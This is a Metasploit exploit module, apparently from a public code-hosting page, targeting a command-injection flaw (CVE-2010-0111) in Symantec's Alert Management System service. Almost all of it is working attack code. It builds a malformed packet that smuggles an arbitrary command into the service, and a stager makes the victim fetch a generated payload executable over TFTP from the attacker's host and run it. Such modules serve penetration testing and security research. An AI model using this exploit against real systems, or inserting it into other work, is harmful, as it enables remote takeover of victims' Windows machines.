Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456class MetasploitModule < Msf::Exploit::Remote78Rank = ExcellentRanking910include Msf::Exploit::Remote::Tcp11include Msf::Exploit::EXE1213def initialize(info = {})14super(update_info(info,15'Name' => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',16'Description' => %q{17Symantec System Center Alert Management System is prone to a18remote command-injection vulnerability because the application fails19to properly sanitize user-supplied input. This is part of Symantec20AntiVirus Corporate Edition 8.0 - 10.1.7.21},22'Author' => [ 'MC' ],23'License' => MSF_LICENSE,24'References' =>25[26['OSVDB', '66807'],27['BID', '41959'],28['CVE', '2010-0111'],29['URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt'],30],31'Targets' =>32[33[ 'Windows Universal',34{35'Arch' => ARCH_X86,36'Platform' => 'win'37}38]39],40'Privileged' => true,41'Platform' => 'win',42'DefaultTarget' => 0,43'DisclosureDate' => '2010-07-26'))4445register_options([46Opt::RPORT(38292),47OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),48OptAddress.new('LHOST', [ false, 'The listen IP address from where the victim downloads the payload' ])49])50end5152def windows_stager5354@pl = generate_payload_exe55@tftp = Rex::Proto::TFTP::Server.new56payload_name = "#{Rex::Text.rand_text_alpha_upper(11)}.exe"57@tftp.register_file(payload_name,@pl,true)58@tftp.start59print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")60execute_command("tftp -i #{datastore['lhost']} GET #{payload_name}")61print_status("Attempting to execute the payload...")62execute_command(payload_name)63end6465def execute_command(cmd, opts = {})6667connect68if ( cmd.length > 128 )69fail_with(Failure::Unknown, "Command strings greater then 128 characters will not be processed!")70end7172string_uno = Rex::Text.rand_text_alpha_upper(11)73string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5)7475packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"76packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"77packet << "\xe8\x03\x00\x00"78packet << 'PRGXCNFG'79packet << "\x10\x00\x00\x00"80packet << "\x00\x00\x00\x00\x04"81packet << 'ALHD\F'82packet << "\x00\x00\x01\x00\x00"83packet << "\x00\x01\x00\x0e\x00"84packet << 'Risk Repaired'85packet << "\x00\x25\x00"86packet << 'Symantec Antivirus Corporate Edition'87packet << "\x00\xf9\x1d\x13\x4a\x3f"88packet << [string_uno.length + 1].pack('v') + string_uno89packet << "\x00\x08\x08\x0a"90packet << "\x00" + 'Risk Name'91packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')92packet << "\x00" + string_dos93packet << "\x00\x08\x0a\x00"94packet << 'File Path'95packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')96packet << "\x00" + string_dos97packet << "\x00\x08\x11\x00"98packet << 'Requested Action'99packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')100packet << "\x00" + string_dos101packet << "\x00\x08\x0e\x00"102packet << 'Actual Action'103packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')104packet << "\x00" + string_dos105packet << "\x00\x08\x07\x00"106packet << 'Logger'107packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')108packet << "\x00" + string_dos109packet << "\x00\x08\x05\x00"110packet << 'User'111packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')112packet << "\x00" + string_dos113packet << "\x00\x08\x09\x00"114packet << 'Hostname'115packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno116packet << "\x00\x08\x13\x00"117packet << 'Corrective Actions'118packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')119packet << "\x00" + string_dos120packet << "\x00\x00\x07\x08\x12\x00"121packet << 'ConfigurationName'122packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')123packet << "\x00" + cmd124packet << "\x00\x08\x0c\x00"125packet << 'CommandLine'126packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')127packet << "\x00" + cmd128packet << "\x00\x08\x08\x00"129packet << 'RunArgs'130packet << "\x00\x04\x00\x02\x00"131packet << "\x20\x00\x03\x05\x00"132packet << 'Mode'133packet << "\x00\x04\x00\x02\x00\x00\x00"134packet << "\x0a\x0d\x00"135packet << 'FormatString'136packet << "\x00\x02\x00\x00\x00\x08\x12\x00"137packet << 'ConfigurationName'138packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"139packet << 'HandlerHost'140packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')141packet << "\x00" + string_dos142packet << "\x00" * packet.length143144sock.put(packet)145146select(nil,nil,nil,3)147disconnect148end149150def exploit151152unless datastore['CMD'].blank?153print_status("Executing command '#{datastore['CMD']}'")154execute_command(datastore['CMD'])155return156end157158case target['Platform']159when 'win'160if datastore['LHOST'].blank?161fail_with(Failure::Unknown, 'If no custom CMD is set, LHOST is required.')162end163windows_stager164else165fail_with(Failure::Unknown, 'Target not supported.')166end167168handler169end170end171172173174